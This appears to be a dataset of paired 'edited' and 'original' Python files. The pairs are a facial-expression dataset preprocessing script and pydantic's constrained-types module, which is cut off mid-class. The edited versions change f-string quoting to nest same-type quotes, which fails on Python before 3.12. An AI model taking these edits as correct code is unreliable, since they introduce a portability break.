edited_code
stringlengths
17
978k
original_code
stringlengths
17
978k
import cv2 from tqdm import tqdm from itertools import chain as iterchain from ..raw import CK from ..raw import JAFFE from ..raw import FER2013 from ...paths import PATH_DATA_PROCESSED from ...utils import * def iter_preproc_datasets(**kwargs): dataset1 = CK(**kwargs) dataset2 = JAFFE(**kwargs) dataset = iterchain(dataset1, dataset2) size = (48, 48) detector = dlib_face_frontal_detector() for image, class_name in dataset: rectangles = get_faces_rectangles(image, detector) rectangle = rectangles[0] x, y, w, h = dlib_rectangle_to_numpy_box(image.shape, rectangle) image = image[y:y+h, x:x+w] image = cv2.resize(image, size) yield image, class_name def iter_fer_2013(**kwargs): return iter(FER2013(**kwargs)) def iter_samples(**kwargs): datapath = PATH_DATA_PROCESSED.joinpath(f"FER{kwargs["num_classes"]}") datapath.mkdir(parents=True, exist_ok=True) dataset = iterchain(iter_preproc_datasets(**kwargs), iter_fer_2013(**kwargs)) for index, sample in enumerate(tqdm(dataset)): yield (datapath, index) + sample def save_sample(args): datapath, index, image, class_name = args savepath = datapath / class_name if not savepath.exists(): savepath.mkdir(parents=True, exist_ok=True) filename = savepath.joinpath(f'{index}.png').as_posix() cv2.imwrite(filename, image) print('Saved:', filename) def generate(**kwargs): return save_sample, iter_samples(**kwargs)
import cv2 from tqdm import tqdm from itertools import chain as iterchain from ..raw import CK from ..raw import JAFFE from ..raw import FER2013 from ...paths import PATH_DATA_PROCESSED from ...utils import * def iter_preproc_datasets(**kwargs): dataset1 = CK(**kwargs) dataset2 = JAFFE(**kwargs) dataset = iterchain(dataset1, dataset2) size = (48, 48) detector = dlib_face_frontal_detector() for image, class_name in dataset: rectangles = get_faces_rectangles(image, detector) rectangle = rectangles[0] x, y, w, h = dlib_rectangle_to_numpy_box(image.shape, rectangle) image = image[y:y+h, x:x+w] image = cv2.resize(image, size) yield image, class_name def iter_fer_2013(**kwargs): return iter(FER2013(**kwargs)) def iter_samples(**kwargs): datapath = PATH_DATA_PROCESSED.joinpath(f"FER{kwargs['num_classes']}") datapath.mkdir(parents=True, exist_ok=True) dataset = iterchain(iter_preproc_datasets(**kwargs), iter_fer_2013(**kwargs)) for index, sample in enumerate(tqdm(dataset)): yield (datapath, index) + sample def save_sample(args): datapath, index, image, class_name = args savepath = datapath / class_name if not savepath.exists(): savepath.mkdir(parents=True, exist_ok=True) filename = savepath.joinpath(f'{index}.png').as_posix() cv2.imwrite(filename, image) print('Saved:', filename) def generate(**kwargs): return save_sample, iter_samples(**kwargs)
import math import re import warnings from decimal import Decimal from enum import Enum from pathlib import Path from types import new_class from typing import ( TYPE_CHECKING, Any, Callable, ClassVar, Dict, List, Optional, Pattern, Set, Type, TypeVar, Union, cast, ) from uuid import UUID from . import errors from .utils import import_string, update_not_none from .validators import ( bytes_validator, constr_length_validator, constr_strip_whitespace, decimal_validator, float_validator, int_validator, list_validator, number_multiple_validator, number_size_validator, path_exists_validator, path_validator, set_validator, str_validator, strict_float_validator, strict_int_validator, strict_str_validator, ) __all__ = [ 'NoneStr', 'NoneBytes', 'StrBytes', 'NoneStrBytes', 'StrictStr', 'ConstrainedBytes', 'conbytes', 'ConstrainedList', 'conlist', 'ConstrainedSet', 'conset', 'ConstrainedStr', 'constr', 'PyObject', 'ConstrainedInt', 'conint', 'PositiveInt', 'NegativeInt', 'ConstrainedFloat', 'confloat', 'PositiveFloat', 'NegativeFloat', 'ConstrainedDecimal', 'condecimal', 'UUID1', 'UUID3', 'UUID4', 'UUID5', 'FilePath', 'DirectoryPath', 'Json', 'JsonWrapper', 'SecretStr', 'SecretBytes', 'StrictBool', 'StrictInt', 'StrictFloat', 'PaymentCardNumber', 'ByteSize', ] NoneStr = Optional[str] NoneBytes = Optional[bytes] StrBytes = Union[str, bytes] NoneStrBytes = Optional[StrBytes] OptionalInt = Optional[int] OptionalIntFloat = Union[OptionalInt, float] OptionalIntFloatDecimal = Union[OptionalIntFloat, Decimal] StrIntFloat = Union[str, int, float] if TYPE_CHECKING: from .dataclasses import DataclassType # noqa: F401 from .fields import ModelField from .main import BaseConfig, BaseModel # noqa: F401 from .typing import CallableGenerator ModelOrDc = Type[Union['BaseModel', 'DataclassType']] class ConstrainedBytes(bytes): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minLength=cls.min_length, maxLength=cls.max_length) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield bytes_validator yield constr_strip_whitespace yield constr_length_validator def conbytes(*, strip_whitespace: bool = False, min_length: int = None, max_length: int = None) -> Type[bytes]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strip_whitespace=strip_whitespace, min_length=min_length, max_length=max_length) return type('ConstrainedBytesValue', (ConstrainedBytes,), namespace) T = TypeVar('T') # This types superclass should be List[T], but cython chokes on that... class ConstrainedList(list): # type: ignore # Needed for pydantic to detect that this is a list __origin__ = list __args__: List[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.list_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def list_length_validator(cls, v: 'Optional[List[T]]', field: 'ModelField') -> 'Optional[List[T]]': if v is None and not field.required: return None v = list_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.ListMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.ListMaxLengthError(limit_value=cls.max_items) return v def conlist(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[List[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedListValue', (ConstrainedList,), {}, lambda ns: ns.update(namespace)) # This types superclass should be Set[T], but cython chokes on that... class ConstrainedSet(set): # type: ignore # Needed for pydantic to detect that this is a set __origin__ = set __args__: Set[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.set_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def set_length_validator(cls, v: 'Optional[Set[T]]', field: 'ModelField') -> 'Optional[Set[T]]': v = set_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.SetMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.SetMaxLengthError(limit_value=cls.max_items) return v def conset(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[Set[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedSetValue', (ConstrainedSet,), {}, lambda ns: ns.update(namespace)) class ConstrainedStr(str): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None curtail_length: OptionalInt = None regex: Optional[Pattern[str]] = None strict = False @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, minLength=cls.min_length, maxLength=cls.max_length, pattern=cls.regex and cls.regex.pattern ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_str_validator if cls.strict else str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate @classmethod def validate(cls, value: Union[str]) -> Union[str]: if cls.curtail_length and len(value) > cls.curtail_length: value = value[: cls.curtail_length] if cls.regex: if not cls.regex.match(value): raise errors.StrRegexError(pattern=cls.regex.pattern) return value def constr( *, strip_whitespace: bool = False, strict: bool = False, min_length: int = None, max_length: int = None, curtail_length: int = None, regex: str = None, ) -> Type[str]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( strip_whitespace=strip_whitespace, strict=strict, min_length=min_length, max_length=max_length, curtail_length=curtail_length, regex=regex and re.compile(regex), ) return type('ConstrainedStrValue', (ConstrainedStr,), namespace) class StrictStr(ConstrainedStr): strict = True if TYPE_CHECKING: StrictBool = bool else: class StrictBool(int): """ StrictBool to allow for bools which are not type-coerced. """ @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='boolean') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> bool: """ Ensure that we only allow bools. """ if isinstance(value, bool): return value raise errors.StrictBoolError() class PyObject: validate_always = True @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> Any: if isinstance(value, Callable): # type: ignore return value try: value = str_validator(value) except errors.StrError: raise errors.PyObjectError(error_message='value is neither a valid import path not a valid callable') try: return import_string(value) except ImportError as e: raise errors.PyObjectError(error_message=str(e)) if TYPE_CHECKING: def __call__(self, *args: Any, **kwargs: Any) -> Any: ... class ConstrainedNumberMeta(type): def __new__(cls, name: str, bases: Any, dct: Dict[str, Any]) -> 'ConstrainedInt': # type: ignore new_cls = cast('ConstrainedInt', type.__new__(cls, name, bases, dct)) if new_cls.gt is not None and new_cls.ge is not None: raise errors.ConfigError('bounds gt and ge cannot be specified at the same time') if new_cls.lt is not None and new_cls.le is not None: raise errors.ConfigError('bounds lt and le cannot be specified at the same time') return new_cls class ConstrainedInt(int, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalInt = None ge: OptionalInt = None lt: OptionalInt = None le: OptionalInt = None multiple_of: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_int_validator if cls.strict else int_validator yield number_size_validator yield number_multiple_validator def conint( *, strict: bool = False, gt: int = None, ge: int = None, lt: int = None, le: int = None, multiple_of: int = None ) -> Type[int]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedIntValue', (ConstrainedInt,), namespace) class PositiveInt(ConstrainedInt): gt = 0 class NegativeInt(ConstrainedInt): lt = 0 class StrictInt(ConstrainedInt): strict = True class ConstrainedFloat(float, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalIntFloat = None ge: OptionalIntFloat = None lt: OptionalIntFloat = None le: OptionalIntFloat = None multiple_of: OptionalIntFloat = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) # Modify constraints to account for differences between IEEE floats and JSON if field_schema.get('exclusiveMinimum') == -math.inf: del field_schema['exclusiveMinimum'] if field_schema.get('minimum') == -math.inf: del field_schema['minimum'] if field_schema.get('exclusiveMaximum') == math.inf: del field_schema['exclusiveMaximum'] if field_schema.get('maximum') == math.inf: del field_schema['maximum'] @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_float_validator if cls.strict else float_validator yield number_size_validator yield number_multiple_validator def confloat( *, strict: bool = False, gt: float = None, ge: float = None, lt: float = None, le: float = None, multiple_of: float = None, ) -> Type[float]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedFloatValue', (ConstrainedFloat,), namespace) class PositiveFloat(ConstrainedFloat): gt = 0 class NegativeFloat(ConstrainedFloat): lt = 0 class StrictFloat(ConstrainedFloat): strict = True class ConstrainedDecimal(Decimal, metaclass=ConstrainedNumberMeta): gt: OptionalIntFloatDecimal = None ge: OptionalIntFloatDecimal = None lt: OptionalIntFloatDecimal = None le: OptionalIntFloatDecimal = None max_digits: OptionalInt = None decimal_places: OptionalInt = None multiple_of: OptionalIntFloatDecimal = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield decimal_validator yield number_size_validator yield number_multiple_validator yield cls.validate @classmethod def validate(cls, value: Decimal) -> Decimal: digit_tuple, exponent = value.as_tuple()[1:] if exponent in {'F', 'n', 'N'}: raise errors.DecimalIsNotFiniteError() if exponent >= 0: # A positive exponent adds that many trailing zeros. digits = len(digit_tuple) + exponent decimals = 0 else: # If the absolute value of the negative exponent is larger than the # number of digits, then it's the same as the number of digits, # because it'll consume all of the digits in digit_tuple and then # add abs(exponent) - len(digit_tuple) leading zeros after the # decimal point. if abs(exponent) > len(digit_tuple): digits = decimals = abs(exponent) else: digits = len(digit_tuple) decimals = abs(exponent) whole_digits = digits - decimals if cls.max_digits is not None and digits > cls.max_digits: raise errors.DecimalMaxDigitsError(max_digits=cls.max_digits) if cls.decimal_places is not None and decimals > cls.decimal_places: raise errors.DecimalMaxPlacesError(decimal_places=cls.decimal_places) if cls.max_digits is not None and cls.decimal_places is not None: expected = cls.max_digits - cls.decimal_places if whole_digits > expected: raise errors.DecimalWholeDigitsError(whole_digits=expected) return value def condecimal( *, gt: Decimal = None, ge: Decimal = None, lt: Decimal = None, le: Decimal = None, max_digits: int = None, decimal_places: int = None, multiple_of: Decimal = None, ) -> Type[Decimal]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( gt=gt, ge=ge, lt=lt, le=le, max_digits=max_digits, decimal_places=decimal_places, multiple_of=multiple_of ) return type('ConstrainedDecimalValue', (ConstrainedDecimal,), namespace) class UUID1(UUID): _required_version = 1 @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format=f'uuid{cls._required_version}') class UUID3(UUID1): _required_version = 3 class UUID4(UUID1): _required_version = 4 class UUID5(UUID1): _required_version = 5 class FilePath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='file-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_file(): raise errors.PathNotAFileError(path=value) return value class DirectoryPath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='directory-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_dir(): raise errors.PathNotADirectoryError(path=value) return value class JsonWrapper: pass class JsonMeta(type): def __getitem__(self, t: Type[Any]) -> Type[JsonWrapper]: return type('JsonWrapperValue', (JsonWrapper,), {'inner_type': t}) class Json(metaclass=JsonMeta): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format='json-string') class SecretStr: @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretStr': if isinstance(value, cls): return value value = str_validator(value) return cls(value) def __init__(self, value: str): self._secret_value = value def __repr__(self) -> str: return f"SecretStr('{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretStr) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_str.display()` is deprecated, use `str(secret_str)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> str: return self._secret_value class SecretBytes: @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretBytes': if isinstance(value, cls): return value value = bytes_validator(value) return cls(value) def __init__(self, value: bytes): self._secret_value = value def __repr__(self) -> str: return f"SecretBytes(b'{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretBytes) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_bytes.display()` is deprecated, use `str(secret_bytes)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> bytes: return self._secret_value class PaymentCardBrand(str, Enum): amex = 'American Express' mastercard = 'Mastercard' visa = 'Visa' other = 'other' def __str__(self) -> str: return self.value class PaymentCardNumber(str): """ Based on: https://en.wikipedia.org/wiki/Payment_card_number """ strip_whitespace: ClassVar[bool] = True min_length: ClassVar[int] = 12 max_length: ClassVar[int] = 19 bin: str last4: str brand: PaymentCardBrand def __init__(self, card_number: str): self.bin = card_number[:6] self.last4 = card_number[-4:] self.brand = self._get_brand(card_number) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate_digits yield cls.validate_luhn_check_digit yield cls yield cls.validate_length_for_brand @property def masked(self) -> str: num_masked = len(self) - 10 # len(bin) + len(last4) == 10 return f'{self.bin}{'*' * num_masked}{self.last4}' @classmethod def validate_digits(cls, card_number: str) -> str: if not card_number.isdigit(): raise errors.NotDigitError return card_number @classmethod def validate_luhn_check_digit(cls, card_number: str) -> str: """ Based on: https://en.wikipedia.org/wiki/Luhn_algorithm """ sum_ = int(card_number[-1]) length = len(card_number) parity = length % 2 for i in range(length - 1): digit = int(card_number[i]) if i % 2 == parity: digit *= 2 if digit > 9: digit -= 9 sum_ += digit valid = sum_ % 10 == 0 if not valid: raise errors.LuhnValidationError return card_number @classmethod def validate_length_for_brand(cls, card_number: 'PaymentCardNumber') -> 'PaymentCardNumber': """ Validate length based on BIN for major brands: https://en.wikipedia.org/wiki/Payment_card_number#Issuer_identification_number_(IIN) """ required_length: Optional[int] = None if card_number.brand in {PaymentCardBrand.visa, PaymentCardBrand.mastercard}: required_length = 16 valid = len(card_number) == required_length elif card_number.brand == PaymentCardBrand.amex: required_length = 15 valid = len(card_number) == required_length else: valid = True if not valid: raise errors.InvalidLengthForBrand(brand=card_number.brand, required_length=required_length) return card_number @staticmethod def _get_brand(card_number: str) -> PaymentCardBrand: if card_number[0] == '4': brand = PaymentCardBrand.visa elif 51 <= int(card_number[:2]) <= 55: brand = PaymentCardBrand.mastercard elif card_number[:2] in {'34', '37'}: brand = PaymentCardBrand.amex else: brand = PaymentCardBrand.other return brand BYTE_SIZES = { 'b': 1, 'kb': 10 ** 3, 'mb': 10 ** 6, 'gb': 10 ** 9, 'tb': 10 ** 12, 'pb': 10 ** 15, 'eb': 10 ** 18, 'kib': 2 ** 10, 'mib': 2 ** 20, 'gib': 2 ** 30, 'tib': 2 ** 40, 'pib': 2 ** 50, 'eib': 2 ** 60, } BYTE_SIZES.update({k.lower()[0]: v for k, v in BYTE_SIZES.items() if 'i' not in k}) byte_string_re = re.compile(r'^\s*(\d*\.?\d+)\s*(\w+)?', re.IGNORECASE) class ByteSize(int): @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, v: StrIntFloat) -> 'ByteSize': try: return cls(int(v)) except ValueError: pass str_match = byte_string_re.match(str(v)) if str_match is None: raise errors.InvalidByteSize() scalar, unit = str_match.groups() if unit is None: unit = 'b' try: unit_mult = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return cls(int(float(scalar) * unit_mult)) def human_readable(self, decimal: bool = False) -> str: if decimal: divisor = 1000 units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'] final_unit = 'EB' else: divisor = 1024 units = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB'] final_unit = 'EiB' num = float(self) for unit in units: if abs(num) < divisor: return f'{num:0.1f}{unit}' num /= divisor return f'{num:0.1f}{final_unit}' def to(self, unit: str) -> float: try: unit_div = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return self / unit_div
import math import re import warnings from decimal import Decimal from enum import Enum from pathlib import Path from types import new_class from typing import ( TYPE_CHECKING, Any, Callable, ClassVar, Dict, List, Optional, Pattern, Set, Type, TypeVar, Union, cast, ) from uuid import UUID from . import errors from .utils import import_string, update_not_none from .validators import ( bytes_validator, constr_length_validator, constr_strip_whitespace, decimal_validator, float_validator, int_validator, list_validator, number_multiple_validator, number_size_validator, path_exists_validator, path_validator, set_validator, str_validator, strict_float_validator, strict_int_validator, strict_str_validator, ) __all__ = [ 'NoneStr', 'NoneBytes', 'StrBytes', 'NoneStrBytes', 'StrictStr', 'ConstrainedBytes', 'conbytes', 'ConstrainedList', 'conlist', 'ConstrainedSet', 'conset', 'ConstrainedStr', 'constr', 'PyObject', 'ConstrainedInt', 'conint', 'PositiveInt', 'NegativeInt', 'ConstrainedFloat', 'confloat', 'PositiveFloat', 'NegativeFloat', 'ConstrainedDecimal', 'condecimal', 'UUID1', 'UUID3', 'UUID4', 'UUID5', 'FilePath', 'DirectoryPath', 'Json', 'JsonWrapper', 'SecretStr', 'SecretBytes', 'StrictBool', 'StrictInt', 'StrictFloat', 'PaymentCardNumber', 'ByteSize', ] NoneStr = Optional[str] NoneBytes = Optional[bytes] StrBytes = Union[str, bytes] NoneStrBytes = Optional[StrBytes] OptionalInt = Optional[int] OptionalIntFloat = Union[OptionalInt, float] OptionalIntFloatDecimal = Union[OptionalIntFloat, Decimal] StrIntFloat = Union[str, int, float] if TYPE_CHECKING: from .dataclasses import DataclassType # noqa: F401 from .fields import ModelField from .main import BaseConfig, BaseModel # noqa: F401 from .typing import CallableGenerator ModelOrDc = Type[Union['BaseModel', 'DataclassType']] class ConstrainedBytes(bytes): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minLength=cls.min_length, maxLength=cls.max_length) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield bytes_validator yield constr_strip_whitespace yield constr_length_validator def conbytes(*, strip_whitespace: bool = False, min_length: int = None, max_length: int = None) -> Type[bytes]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strip_whitespace=strip_whitespace, min_length=min_length, max_length=max_length) return type('ConstrainedBytesValue', (ConstrainedBytes,), namespace) T = TypeVar('T') # This types superclass should be List[T], but cython chokes on that... class ConstrainedList(list): # type: ignore # Needed for pydantic to detect that this is a list __origin__ = list __args__: List[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.list_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def list_length_validator(cls, v: 'Optional[List[T]]', field: 'ModelField') -> 'Optional[List[T]]': if v is None and not field.required: return None v = list_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.ListMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.ListMaxLengthError(limit_value=cls.max_items) return v def conlist(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[List[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedListValue', (ConstrainedList,), {}, lambda ns: ns.update(namespace)) # This types superclass should be Set[T], but cython chokes on that... class ConstrainedSet(set): # type: ignore # Needed for pydantic to detect that this is a set __origin__ = set __args__: Set[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.set_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def set_length_validator(cls, v: 'Optional[Set[T]]', field: 'ModelField') -> 'Optional[Set[T]]': v = set_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.SetMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.SetMaxLengthError(limit_value=cls.max_items) return v def conset(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[Set[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedSetValue', (ConstrainedSet,), {}, lambda ns: ns.update(namespace)) class ConstrainedStr(str): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None curtail_length: OptionalInt = None regex: Optional[Pattern[str]] = None strict = False @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, minLength=cls.min_length, maxLength=cls.max_length, pattern=cls.regex and cls.regex.pattern ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_str_validator if cls.strict else str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate @classmethod def validate(cls, value: Union[str]) -> Union[str]: if cls.curtail_length and len(value) > cls.curtail_length: value = value[: cls.curtail_length] if cls.regex: if not cls.regex.match(value): raise errors.StrRegexError(pattern=cls.regex.pattern) return value def constr( *, strip_whitespace: bool = False, strict: bool = False, min_length: int = None, max_length: int = None, curtail_length: int = None, regex: str = None, ) -> Type[str]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( strip_whitespace=strip_whitespace, strict=strict, min_length=min_length, max_length=max_length, curtail_length=curtail_length, regex=regex and re.compile(regex), ) return type('ConstrainedStrValue', (ConstrainedStr,), namespace) class StrictStr(ConstrainedStr): strict = True if TYPE_CHECKING: StrictBool = bool else: class StrictBool(int): """ StrictBool to allow for bools which are not type-coerced. """ @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='boolean') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> bool: """ Ensure that we only allow bools. """ if isinstance(value, bool): return value raise errors.StrictBoolError() class PyObject: validate_always = True @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> Any: if isinstance(value, Callable): # type: ignore return value try: value = str_validator(value) except errors.StrError: raise errors.PyObjectError(error_message='value is neither a valid import path not a valid callable') try: return import_string(value) except ImportError as e: raise errors.PyObjectError(error_message=str(e)) if TYPE_CHECKING: def __call__(self, *args: Any, **kwargs: Any) -> Any: ... class ConstrainedNumberMeta(type): def __new__(cls, name: str, bases: Any, dct: Dict[str, Any]) -> 'ConstrainedInt': # type: ignore new_cls = cast('ConstrainedInt', type.__new__(cls, name, bases, dct)) if new_cls.gt is not None and new_cls.ge is not None: raise errors.ConfigError('bounds gt and ge cannot be specified at the same time') if new_cls.lt is not None and new_cls.le is not None: raise errors.ConfigError('bounds lt and le cannot be specified at the same time') return new_cls class ConstrainedInt(int, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalInt = None ge: OptionalInt = None lt: OptionalInt = None le: OptionalInt = None multiple_of: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_int_validator if cls.strict else int_validator yield number_size_validator yield number_multiple_validator def conint( *, strict: bool = False, gt: int = None, ge: int = None, lt: int = None, le: int = None, multiple_of: int = None ) -> Type[int]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedIntValue', (ConstrainedInt,), namespace) class PositiveInt(ConstrainedInt): gt = 0 class NegativeInt(ConstrainedInt): lt = 0 class StrictInt(ConstrainedInt): strict = True class ConstrainedFloat(float, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalIntFloat = None ge: OptionalIntFloat = None lt: OptionalIntFloat = None le: OptionalIntFloat = None multiple_of: OptionalIntFloat = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) # Modify constraints to account for differences between IEEE floats and JSON if field_schema.get('exclusiveMinimum') == -math.inf: del field_schema['exclusiveMinimum'] if field_schema.get('minimum') == -math.inf: del field_schema['minimum'] if field_schema.get('exclusiveMaximum') == math.inf: del field_schema['exclusiveMaximum'] if field_schema.get('maximum') == math.inf: del field_schema['maximum'] @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_float_validator if cls.strict else float_validator yield number_size_validator yield number_multiple_validator def confloat( *, strict: bool = False, gt: float = None, ge: float = None, lt: float = None, le: float = None, multiple_of: float = None, ) -> Type[float]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedFloatValue', (ConstrainedFloat,), namespace) class PositiveFloat(ConstrainedFloat): gt = 0 class NegativeFloat(ConstrainedFloat): lt = 0 class StrictFloat(ConstrainedFloat): strict = True class ConstrainedDecimal(Decimal, metaclass=ConstrainedNumberMeta): gt: OptionalIntFloatDecimal = None ge: 